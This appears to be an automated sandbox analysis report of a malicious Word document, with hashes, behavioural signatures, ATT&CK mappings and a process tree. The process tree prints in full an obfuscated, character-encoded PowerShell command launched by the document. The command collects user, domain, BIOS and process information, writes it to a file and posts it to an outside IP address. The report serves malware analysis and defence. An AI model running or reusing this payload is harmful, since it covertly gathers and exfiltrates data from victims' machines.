f3ed5aa73ee8261ed9c1231f53c84fc75128c536c1387f704ecf701e02e05912

Resubmissions

02-04-2023 21:00

230402-ztkmssaf63 10

02-04-2023 21:00

230402-ztb1naaf59 8

02-04-2023 19:34

230402-x95lssbe3y 10

Analysis

max time kernel
140s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
02-04-2023 19:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f3ed5aa73ee8261ed9c1231f53c84fc75128c536c1387f704ecf701e02e05912.doc
Size

699KB
MD5

e2b75e2ccc3d5309653dabe4de2cc9a6
SHA1

c265fc8f620dd242c71bb4644725097e5b27fff6
SHA256

f3ed5aa73ee8261ed9c1231f53c84fc75128c536c1387f704ecf701e02e05912
SHA512

378595f0908d462dbfc842468485c5734371da685117bdb8f3d6ec0c80ff19f51ba9b9d1be03f683889caf9570be8b4bd42b3097c20fb7df5552d37a711d747a
SSDEEP

12288:ieBDrBqfxtgV2rL1OlSogN/wLoRexQY0V5sEGI6D2YSrjWY6MkfnrueA4:fDSeV2rL1FoA/w0Y0V5/6D2dvWYIPruB

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4316	524	powershell.exe	WINWORD.EXE

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\9e43f393-3e18-4b8a-9e9a-ce5464d6cb01.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20230402213541.pma	setup.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEmsedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

524 WINWORD.EXE
524 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exemsedge.exemsedge.exeidentity_helper.exe

pid process

4316 powershell.exe
4316 powershell.exe
3292 msedge.exe
3292 msedge.exe
2712 msedge.exe
2712 msedge.exe
636 identity_helper.exe
636 identity_helper.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

2712 msedge.exe
2712 msedge.exe
2712 msedge.exe
2712 msedge.exe
2712 msedge.exe
2712 msedge.exe
2712 msedge.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4316 powershell.exe
Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

2712 msedge.exe
2712 msedge.exe
2712 msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

pid	process
4316	powershell.exe
4316	powershell.exe
3292	msedge.exe
3292	msedge.exe
2712	msedge.exe
2712	msedge.exe
636	identity_helper.exe
636	identity_helper.exe

pid	process
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe

description	pid	process
Token: SeDebugPrivilege	4316	powershell.exe

pid	process
2712	msedge.exe
2712	msedge.exe
2712	msedge.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

WINWORD.EXE

pid	process
524	WINWORD.EXE
524	WINWORD.EXE
524	WINWORD.EXE
524	WINWORD.EXE
524	WINWORD.EXE
524	WINWORD.EXE
524	WINWORD.EXE
524	WINWORD.EXE
524	WINWORD.EXE
524	WINWORD.EXE
524	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEpowershell.exemsedge.exe

description	pid	process	target process
PID 524 wrote to memory of 4316	524	WINWORD.EXE	powershell.exe
PID 524 wrote to memory of 4316	524	WINWORD.EXE	powershell.exe
PID 4316 wrote to memory of 2712	4316	powershell.exe	msedge.exe
PID 4316 wrote to memory of 2712	4316	powershell.exe	msedge.exe
PID 2712 wrote to memory of 2892	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 2892	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 4300	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 3292	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 3292	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe
PID 2712 wrote to memory of 1896	2712	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f3ed5aa73ee8261ed9c1231f53c84fc75128c536c1387f704ecf701e02e05912.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden ('68r111:32y123c36A123N65N125:32I61l32N46r40-39N71A39-43:39:101y116A45-82:39:43r39y97-110w39-43-39A100y111A109A39y41-32A45w77N105A110y105A109A117:109l32:48A32:45r77I97w120y105l109N117w109y32N57I57w57r57A57r57-125y32A85c110c116w105A108A40r33I40A46r40c39c84w101c115N39l43r39w116r39N43w39l45:80I39y43-39w97:116c104N39l41c32A34A36A40:36c101I110:118A58y76c79A67w65N76I65A80I80A68c65r84y65A41w92:84:101l109I112A92-36y40A36I97A41r46-116y120r116l34-41N41w59-32l13l10-13w10A36N123y98c125I32N61A32N34-36l40w36y101r110l118N58w76r79-67A65-76y65w80A80c68y65N84:65-41y92y84w101N109c112I92l34:32-43y32N36:123:65c125c32-43y32:40c34:123l48w125N123-49-125A34l45y102-39w46-39-44N39l116y120r116c39I41A59-13c10w36N123r67:125r32I61c32w46r40:39r71I101:39w43r39-116l45w87I109y105w79I98I106c39r43y39c101:99y39N43w39w116-39N41c32l45r81I117-101N114A121r32w40A34I123l49y51N125l123:49y52N125c123:53N125l123A51I125c123N49A125-123-49y49w125A123N50:125y123y54l125-123l52w125l123-49I50A125I123A49w48l125-123:55r125l123l57N125A123c56c125-123:48l125l34I45A102c39N117w116A101y114N83:121-115-116N101I109l39-44-39:101-44-32I68r111c109A97r39I44A39I32N39N44N39-101A44l32l78:97c109A39c44l39N97l110r117:102c97:99N39:44c39-108A101y99-116w32N85A115r101y114-78I97l109y39c44N39N77N39A44r39A84l121r112w101-32c102w114y111A39r44w39r109l112:39y44c39r109c32-87w105I110c51c50w95y67:111I39c44:39r101c114r44N32-77N111N100y101-108w44I32l83l121y115A116A101-109I39r44r39N105c110I44l39:44l39r116-117I114c39r44r39I83w39N44A39c101-39N41y59:13I10A36r123y68N125:32I61A32c38r40l39:71-39y43:39A101w116r45y87:109:105-39l43:39y79y39y43-39y98-106r101c39I43-39l99-116I39c41w32y45l81l117c101-114:121y32w40A34-123c53y125w123y52y125l123-56w125I123A54-125l123l57-125r123A48N125I123-50-125r123r51l125r123I55y125-123r49A125I34w32-45:102w39r101w114c32:39l44:39y51r50r95c66:73-79w83:39l44-39y102w39N44c39-114N111l109:39y44A39w32:83I101l114-39w44I39:83N101w108w101I99c116A39I44N39w97:108y78l117y39y44r39r32-87:105-110A39-44r39y105N39I44A39r109l98c39N41r59A13N10r36:123:101c125r32l61y32c46A40N39:71w39c43y39c101r116A39-43:39A45w87-109c105I79I98w39w43-39y106l101c39l43c39r99c116:39y41N32l45:81y117A101c114r121A32A40N34:123w54r125:123l56l125I123y48w125w123c57c125N123l55r125l123A51A125y123I50l125N123l49:48w125I123N53r125-123:52:125-123r49N125l34-45w102I32r39w116c32c67A97A112N116A105I111r39c44:39A115c116A101y109r39y44l39A87y105A110-51I50c95c79-112I101r114A97:39c44c39w32N39r44I39r103c83r121w39I44c39I105-110A39N44:39N83-39I44:39r109w39r44I39-101:108y101w99A39w44r39r110A32-102:114N111l39I44w39I116c39I41c59w13A10-36l123-70A125:32A61y32A46l40-39w71y101:116y39r43c39:45y39A43c39I87c109c105N79I39c43I39:98I106y101I39l43c39N99N116N39I41I32w45c81I117c101-114l121I32w40-34:123y53N125I123I49A51N125N123y48I125y123w49c52I125r123-50c125y123w49l53-125r123I52N125-123y51c125I123c49I50N125:123:57c125N123I49w55:125c123y49:54c125A123r56c125:123A49y48l125:123I49-125A123A54l125r123c49A49w125w123N55-125I34I32A45A102N39N109-39:44N39A84c39r44w39c32N102:114l111y109l32w87I105I110l39l44:39r85w115N101y114I39I44w39c95:39-44w39w83I101I108N101c99w116:32I39N44N39l114w39y44-39c101r39l44w39y99-97I108r65l99I99c111I117c39:44I39w99N99r111c117I39-44A39y110c116y32A61c32r39-44c39I117-39l44y39A65-39r44w39l78y97c39I44y39w101l39w44c39-51r50:39:44l39w32y87A104l101w114-101c32c76r111r39I44N39:110A116y39N41A59w13w10N36c123w103c125l32I61c32I46A40I39N71r39w43y39r101y116-45I87c39I43c39r109l105I79I98c106:39l43l39:101y39w43l39w99w116r39:41-32y45N81c117l101l114w121r32:40w34c123r53-125y123c49A49-125w123A56I125:123w51c125:123w54I125l123w50r125r123w49y48r125-123-57y125c123y49l125A123r48y125A123N55w125I123r52c125c34y45-102l39c32c87y39w44N39I111N109r39:44-39c109N101r44r32A80c114-111I99r101:115-39w44A39c32:78c39r44A39I115w115A39N44l39r83N101l108I39r44l39r97I39-44N39w105c110y51I50N95A80A114y111A99N101w39w44I39N99y116:39-44A39c32N102w114I39:44A39A115r73I68A39A44I39c101y39c41r59w13I10I13:10r46l40I39I110A105y39r41-32-45w80w97w116:104w32A36l123y66I125N32y45l70I111:114l99-101r32l124I32y38w40w39c79l39w43-39w117I116l45c78l117r108w108I39r41A59c13l10A13N10r36w123l99y125:46l34-117N115:96I69y96w82l110y97:77r101A34w32:62l62N32c36-123A66-125-59I13I10w36A123:67c125I46:34c110N96r65c109-101w34r32I62I62I32l36I123l98:125A59l13w10N36-123-67y125-46r34c68r111y96y77w65I105I78A34A32r62w62I32l36c123-98r125A59A13:10l34-36-40w36A99c46y77r97A110I117-102:97N99-116N117c114l101N114l41c32I36I40l36:99w46w77l111N100c101l108N41N32w34w32r62r62I32:36w123A66l125w59N13A10N36l123-100A125I46-34-115r101:96w82N73A96-65-76l78:85I77:96:66l69y114y34-32r62w62:32N36-123y66r125A59N13N10-34:36:40N36c101-46r67I97w112y116A105r111r110r41I32w36c40y36c99w46:83r121l115I116y101N109w84y121N112:101-41:32w34r32I62:62:32A36-123w66y125I59y13w10-34l34I32N62-62-32r36A123r66I125c59c13I10w70A111:114-69y97-99c104y40-36y123l78:125:32I105r110I32w36-123c70N125N41l123N36N123c110:125y46w34y110-96r65r77N69c34:32N62r62c32:36:123-66y125l125w59N13c10-34A34c32w62N62:32c36c123:66r125y59c13I10l70c111r114N69r97:99r104-40-36:123N112y125-32y105y110w32-36A123:103:125I41w123l34:36r40l36l112N46I80-114r111I99y101:115l115l73N68N41l32w36I40:36l112I46-78A97w109-101N41N32-34N32:62-62-32I36c123y66l125:125y59w13N10y13:10-116y114:121A32r123w36-123r82A125N32I61-32-46l40I39w103l99:39A41-32w36l123I98r125I32:45A82-101A97N100y67A111y117N110l116w32y48l32I124:32N38-40:39l105w39-43A39c119-114y39y41w32-40-34y123-53c125A123A50r125r123N52r125N123I49N125:123I48l125I123r51I125-123N54r125I34N45-102w39r74r51I99w39y44w39I55A51r39y44-39l56:47N51c106c39r44r39I55l51N39N44:39:51-67w39y44-39I49A48-46:49N46w54A46I39l44r39A74N51w67y55-39A41N32y45y77I101:116r104r111N100l32-40A34l123w48r125I123y49c125l34I45:102w32:39N80r79c39N44N39N83y84:39w41N32N45w67:111c110I116I101w110-116A84r121-112:101I32y40A34-123N50:125l123r49-125c123w48-125w34w45l102l39y116A47-112y108I97N105c110N39I44l39I101r120:39w44N39N116r39N41w125-32-99:97c116I99-104w32A123l36N123w82w125N32A61A32-36y123N95r125y46r34w69I88A96A99:69A80A84A96N73A79I78I34:125y59y13N10N13r10c38c40c39c115I39N43:39w116:97:114l116:39w41:32N40r34c123l54r125A123y49-125c123I51l125c123I53N125:123c48r125c123I50N125w123y52l125A123y55y125A34y45:102y32I39l114I108-39c44r39r112I115A58:47y39y44N39A46:97N116:47N97I99N109I39c44I39N47l115A39r44y39A83:39:44w39A104c111N114c116I117w39y44y39A104N116y116c39r44l39y54A39:41N13c10c13r10c46l40y39w114A105:39y41r32y36r123:66w125A13c10A35y102I108A97A103y123I97N53r99-49c49A95l102-114I51I51c95:52:55r95c108N52:53A55l125'.spLiT(':Nr-wIlycA') | %{( [CHar][INt] $_) }) -jOIN '' |.( $SHeLLID[1]+$sHELLid[13]+'x')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://shorturl.at/acmS6
3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffd2e9e46f8,0x7ffd2e9e4708,0x7ffd2e9e4718
4⤵
PID:2892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
4⤵
PID:4300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
4⤵
PID:1896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
4⤵
PID:312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
4⤵
PID:60

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
4⤵
PID:4092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
4⤵
PID:4144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
4⤵
PID:4800

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4232 /prefetch:8
4⤵
PID:3360

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
4⤵
- Drops file in Program Files directory
PID:3536

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff771715460,0x7ff771715470,0x7ff771715480
5⤵
PID:3200

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4232 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
4⤵
PID:3320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,756742570843391239,7858902192225628020,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
4⤵
PID:5084

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
cd4f5fe0fc0ab6b6df866b9bfb9dd762

SHA1
a6aaed363cd5a7b6910e9b3296c0093b0ac94759

SHA256
3b803b53dbd3d592848fc66e5715f39f6bc02cbc95fb2452cd5822d98c6b8f81

SHA512
7072630ec28cf6a8d5b072555234b5150c1e952138e5cdc29435a6242fda4b4217b81fb57acae927d2b908fa06f36414cb3fab35110d63107141263e3bba9676

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
1d40312629d09d2420e992fdb8a78c1c

SHA1
903950d5ba9d64ec21c9f51264272ca8dfae9540

SHA256
1e7c6aa575c3ec46cd1fdf6df51063113d277012ed28f5f6b37aea95cd3a64ac

SHA512
a7073247ae95e451ed32ceeae91c6638192c15eaad718875c1272eff51c0564016d9f84690543f27df509a7d579de329d101fbf82fed7cbeb27af57393de24ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
48B

MD5
afaeecd06cb495d4770f3757cdf185a9

SHA1
08e32775b4ac51ae7e1a503ad40330e8dfc7c3cd

SHA256
41c835b75242977e4e59e3c90d29aab236880a8eb3904d3e3da74e08c2a8cdc1

SHA512
fe729fd4489991bcd2c4fe7a811ef86f89bbd9db4297b57a1981854f6c971d91d267f5a3fb31494d96e0b70d69765ea801a46264140197aade779fcbdcc98dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
72B

MD5
bf4b1b002b6f3194fdb59aedc5df36c4

SHA1
26edbdef74bb049dc2c310dd861779bf26f086ee

SHA256
d429d315580c5efc8c927a0e3ef2ee37039e26736ad9f7b272dd7bbd54bab4e7

SHA512
ed2fd526ebf15bae183ec3f9de6442daf339c8479498f04bccc34c4aa6d692e3909469abbd85c0c24d1ec29a71f779273b0ed73034b7a8301bdf2e73f7dd4097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
Filesize
2KB

MD5
4ee15311e449f26ba7f30e30772165bd

SHA1
86d4d34cc99af8fdf158f46946bed50a5f13a51d

SHA256
